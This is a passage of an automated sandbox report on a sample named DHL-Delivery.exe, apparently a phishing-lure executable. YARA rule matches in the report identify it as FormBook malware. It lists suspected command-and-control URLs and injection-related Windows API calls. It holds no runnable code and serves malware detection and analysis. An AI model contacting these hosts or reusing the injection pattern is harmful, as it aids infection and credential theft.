    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.olenfex.com/mph/www.bikeemperor.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.olenfex.com/mph/www.koottukudumbam.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.olenfex.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.simplymadphotography.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.simplymadphotography.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.simplymadphotography.com/mph/www.irisgiladiphotography.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.simplymadphotography.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.tnx2u.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.tnx2u.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.tnx2u.com/mph/www.groupoperationltd.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.tnx2u.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.ytvksh.space
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.ytvksh.space/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.ytvksh.space/mph/www.maxmaldives.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.ytvksh.spaceReferer:
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuneimit.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuneimit.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuneimit.com/mph/www.tnx2u.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuneimit.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: SearchUI.exe, 00000019.00000003.3131603518.000001EEB5F40000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
    Source: explorer.exe, 00000007.00000002.2742124576.000000000E3B0000.00000002.00000001.sdmp, cmd.exe, 0000000B.00000002.2190137433.0000000000BA0000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.2747253396.00000243B7910000.00000002.00000001.sdmpString found in binary or memory: https://aka.ms/hcsadmin
    Source: explorer.exe, 00000007.00000000.2121644383.0000000007F8F000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoft.
    Source: SearchUI.exe, 00000019.00000003.3129415140.000001EEA35B5000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/
    Source: SearchUI.exe, 00000019.00000003.2989658115.000001E6A2230000.00000004.00000001.sdmp, Init[1].htm.25.drString found in binary or memory: https://mths.be/fromcodepoint
    Source: SearchUI.exe, 00000019.00000003.3118195729.000001EEA3FF3000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comf.prototype.getAllAccountTokensi.prototype.isValidSuggestion
    Source: SearchUI.exe, 00000019.00000003.3130393716.000001EEA41D0000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
    Source: SearchUI.exe, 00000019.00000003.3116255345.000001EEA3E29000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: cmmon32.exe, 0000000A.00000002.3610263692.000000000568F000.00000004.00000001.sdmpString found in binary or memory: https://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000010.00000000.2601163348.000000000198F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A9AFD NtSetInformationThread,LoadLibraryA,0_2_021A9AFD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAB3F NtSetInformationThread,LoadLibraryA,NtResumeThread,0_2_021AAB3F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A93E2 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,0_2_021A93E2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A5862 NtSetInformationThread,0_2_021A5862
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A07FF EnumWindows,NtSetInformationThread,0_2_021A07FF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AA407 NtProtectVirtualMemory,0_2_021AA407
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A0C05 NtSetInformationThread,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,0_2_021A0C05
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB232 NtResumeThread,0_2_021AB232
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4226 NtWriteVirtualMemory,0_2_021A4226
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A0A45 NtSetInformationThread,0_2_021A0A45
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4262 NtWriteVirtualMemory,0_2_021A4262
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A0A8A NtSetInformationThread,0_2_021A0A8A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB283 NtResumeThread,0_2_021AB283
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A42A1 NtWriteVirtualMemory,0_2_021A42A1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A42DC NtWriteVirtualMemory,0_2_021A42DC
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAB19 NtResumeThread,0_2_021AAB19
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4313 NtWriteVirtualMemory,0_2_021A4313
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4359 NtWriteVirtualMemory,0_2_021A4359
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAB45 NtResumeThread,0_2_021AAB45
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A8B71 NtSetInformationThread,0_2_021A8B71
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A836D NtSetInformationThread,0_2_021A836D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAB8F NtResumeThread,0_2_021AAB8F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AABB3 NtResumeThread,0_2_021AABB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A43DB NtWriteVirtualMemory,0_2_021A43DB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AABDD NtResumeThread,0_2_021AABDD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AABFD NtResumeThread,0_2_021AABFD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB01A NtResumeThread,0_2_021AB01A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4804 NtWriteVirtualMemory,0_2_021A4804
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB03A NtResumeThread,0_2_021AB03A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4025 NtWriteVirtualMemory,0_2_021A4025
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A406C NtWriteVirtualMemory,0_2_021A406C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB061 NtResumeThread,0_2_021AB061
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB085 NtResumeThread,0_2_021AB085
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A40A6 NtWriteVirtualMemory,0_2_021A40A6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB0CB NtResumeThread,0_2_021AB0CB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A90C3 NtSetInformationThread,LoadLibraryA,0_2_021A90C3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A08FC NtSetInformationThread,0_2_021A08FC
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB0E9 NtResumeThread,0_2_021AB0E9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A40E1 NtWriteVirtualMemory,0_2_021A40E1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB109 NtResumeThread,0_2_021AB109
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A090D NtSetInformationThread,0_2_021A090D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A0904 NtSetInformationThread,0_2_021A0904
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB132 NtResumeThread,0_2_021AB132
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A2921 NtSetInformationThread,LoadLibraryA,0_2_021A2921
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4124 NtWriteVirtualMemory,0_2_021A4124
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB156 NtResumeThread,0_2_021AB156
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB177 NtResumeThread,0_2_021AB177
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A0974 NtSetInformationThread,0_2_021A0974
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4160 NtWriteVirtualMemory,0_2_021A4160
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4195 NtWriteVirtualMemory,0_2_021A4195
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB1BA NtResumeThread,0_2_021AB1BA
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A09A6 NtSetInformationThread,0_2_021A09A6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A41DF NtWriteVirtualMemory,0_2_021A41DF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AB1FB NtResumeThread,0_2_021AB1FB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A09F9 NtSetInformationThread,0_2_021A09F9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAE0B NtResumeThread,0_2_021AAE0B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A1E31 NtSetInformationThread,LoadLibraryA,0_2_021A1E31
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A462B NtWriteVirtualMemory,0_2_021A462B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAE2E NtResumeThread,0_2_021AAE2E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A467A NtWriteVirtualMemory,0_2_021A467A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAEA0 NtResumeThread,0_2_021AAEA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A46D4 NtWriteVirtualMemory,0_2_021A46D4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A56E1 NtWriteVirtualMemory,LdrInitializeThunk,0_2_021A56E1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAEE7 NtResumeThread,0_2_021AAEE7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A0712 NtSetInformationThread,0_2_021A0712
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A470B NtWriteVirtualMemory,0_2_021A470B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAF38 NtResumeThread,0_2_021AAF38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4736 NtWriteVirtualMemory,0_2_021A4736
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A472C NtWriteVirtualMemory,0_2_021A472C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAF5F NtResumeThread,0_2_021AAF5F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4742 NtWriteVirtualMemory,0_2_021A4742
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A476E NtWriteVirtualMemory,0_2_021A476E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAF84 NtResumeThread,0_2_021AAF84
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A47A7 NtWriteVirtualMemory,0_2_021A47A7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAFC9 NtResumeThread,0_2_021AAFC9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAFED NtResumeThread,0_2_021AAFED
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A442D NtWriteVirtualMemory,0_2_021A442D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAC20 NtResumeThread,0_2_021AAC20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAC4D NtResumeThread,0_2_021AAC4D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4471 NtWriteVirtualMemory,0_2_021A4471
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAC74 NtResumeThread,0_2_021AAC74
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AACB5 NtResumeThread,0_2_021AACB5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AACA0 NtResumeThread,0_2_021AACA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AACD2 NtResumeThread,0_2_021AACD2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A44C3 NtWriteVirtualMemory,0_2_021A44C3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A4504 NtWriteVirtualMemory,0_2_021A4504
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A253A NtSetInformationThread,0_2_021A253A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAD35 NtResumeThread,0_2_021AAD35
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAD59 NtResumeThread,0_2_021AAD59
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A454A NtWriteVirtualMemory,0_2_021A454A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AAD7A NtResumeThread,0_2_021AAD7A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A458D NtWriteVirtualMemory,0_2_021A458D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AADA1 NtResumeThread,0_2_021AADA1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021AADC1 NtResumeThread,0_2_021AADC1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A45E3 NtWriteVirtualMemory,0_2_021A45E3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120800 NtQuerySystemInformation,LdrInitializeThunk,6_2_1E120800
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120890 NtReadVirtualMemory,LdrInitializeThunk,6_2_1E120890
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1208B0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_1E1208B0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120940 NtCreateSection,LdrInitializeThunk,6_2_1E120940
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1209A0 NtProtectVirtualMemory,LdrInitializeThunk,6_2_1E1209A0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1209C0 NtResumeThread,LdrInitializeThunk,6_2_1E1209C0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1209F0 NtCreateFile,LdrInitializeThunk,6_2_1E1209F0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120600 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_1E120600
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120680 NtFreeVirtualMemory,LdrInitializeThunk,6_2_1E120680
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1206B0 NtQueryInformationToken,LdrInitializeThunk,6_2_1E1206B0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120720 NtMapViewOfSection,LdrInitializeThunk,6_2_1E120720
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120740 NtUnmapViewOfSection,LdrInitializeThunk,6_2_1E120740
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1207E0 NtDelayExecution,LdrInitializeThunk,6_2_1E1207E0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1204E0 NtReadFile,LdrInitializeThunk,6_2_1E1204E0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120570 NtClose,LdrInitializeThunk,6_2_1E120570
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120F80 NtCreateMutant,6_2_1E120F80
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E121FF0 NtSuspendThread,6_2_1E121FF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E121CE0 NtSetContextThread,6_2_1E121CE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120A20 NtOpenDirectoryObject,6_2_1E120A20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120AA0 NtSetValueKey,6_2_1E120AA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120840 NtWriteVirtualMemory,6_2_1E120840
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1208F0 NtQueueApcThread,6_2_1E1208F0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120970 NtCreateProcessEx,6_2_1E120970
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1209B0 NtQuerySection,6_2_1E1209B0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120610 NtQueryInformationProcess,6_2_1E120610
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120670 NtCreateKey,6_2_1E120670
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1206D0 NtQueryVirtualMemory,6_2_1E1206D0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1216C0 NtOpenProcessToken,6_2_1E1216C0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120710 NtSetInformationFile,6_2_1E120710
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120700 NtOpenProcess,6_2_1E120700
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E121720 NtOpenThread,6_2_1E121720
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1207C0 NtEnumerateKey,6_2_1E1207C0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1204C0 NtWaitForSingleObject,6_2_1E1204C0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120500 NtWriteFile,6_2_1E120500
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E120590 NtQueryInformationFile,6_2_1E120590
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1205B0 NtEnumerateValueKey,6_2_1E1205B0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1205F0 NtQueryValueKey,6_2_1E1205F0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E121360 NtGetContextThread,6_2_1E121360
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056A407 NtProtectVirtualMemory,6_2_0056A407
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AB3F LoadLibraryA,NtQueryInformationProcess,6_2_0056AB3F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B061 NtQueryInformationProcess,6_2_0056B061
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B01A NtQueryInformationProcess,6_2_0056B01A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B03A NtQueryInformationProcess,6_2_0056B03A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B0CB NtQueryInformationProcess,6_2_0056B0CB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B0E9 NtQueryInformationProcess,6_2_0056B0E9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B085 NtQueryInformationProcess,6_2_0056B085
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B156 NtQueryInformationProcess,6_2_0056B156
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B177 NtQueryInformationProcess,6_2_0056B177
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B109 NtQueryInformationProcess,6_2_0056B109
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B132 NtQueryInformationProcess,6_2_0056B132
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B1FB NtQueryInformationProcess,6_2_0056B1FB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B1BA NtQueryInformationProcess,6_2_0056B1BA
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B232 NtQueryInformationProcess,6_2_0056B232
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056B283 NtQueryInformationProcess,6_2_0056B283
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AB45 NtQueryInformationProcess,6_2_0056AB45
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AB19 NtQueryInformationProcess,6_2_0056AB19
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056ABDD NtQueryInformationProcess,6_2_0056ABDD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056ABFD NtQueryInformationProcess,6_2_0056ABFD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AB8F NtQueryInformationProcess,6_2_0056AB8F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056ABB3 NtQueryInformationProcess,6_2_0056ABB3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AC4D NtQueryInformationProcess,6_2_0056AC4D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AC74 NtQueryInformationProcess,6_2_0056AC74
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AC20 NtQueryInformationProcess,6_2_0056AC20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056ACD2 NtQueryInformationProcess,6_2_0056ACD2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056ACB5 NtQueryInformationProcess,6_2_0056ACB5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056ACA0 NtQueryInformationProcess,6_2_0056ACA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AD59 NtQueryInformationProcess,6_2_0056AD59
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AD7A NtQueryInformationProcess,6_2_0056AD7A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_0056AD35 NtQueryInformationProcess,6_2_0056AD35
